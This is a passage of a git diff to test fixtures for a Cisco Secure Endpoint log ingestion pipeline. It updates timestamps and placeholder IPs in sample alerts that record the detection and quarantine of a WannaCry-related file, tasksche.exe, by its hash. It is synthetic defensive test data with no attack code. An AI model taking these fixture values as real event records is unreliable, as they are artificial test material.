@@ -4512,8 +4512,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798774907Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010910200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4535,7 +4535,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4581,7 +4581,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4598,8 +4598,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798777126Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010914400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4621,7 +4621,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4667,7 +4667,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4684,8 +4684,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798779340Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010919700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4707,7 +4707,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4753,7 +4753,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4770,8 +4770,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798781577Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010923700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4793,7 +4793,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4839,7 +4839,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4856,8 +4856,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798783833Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010927600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4879,7 +4879,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4925,7 +4925,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4942,8 +4942,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798786045Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010931700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4965,7 +4965,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5011,7 +5011,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5028,8 +5028,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798788263Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010936Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -5051,7 +5051,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5092,7 +5092,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5102,8 +5102,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798790467Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010940500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -5123,7 +5123,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log index 6ccff00d38b..da5ec2ad9db 100644 --- 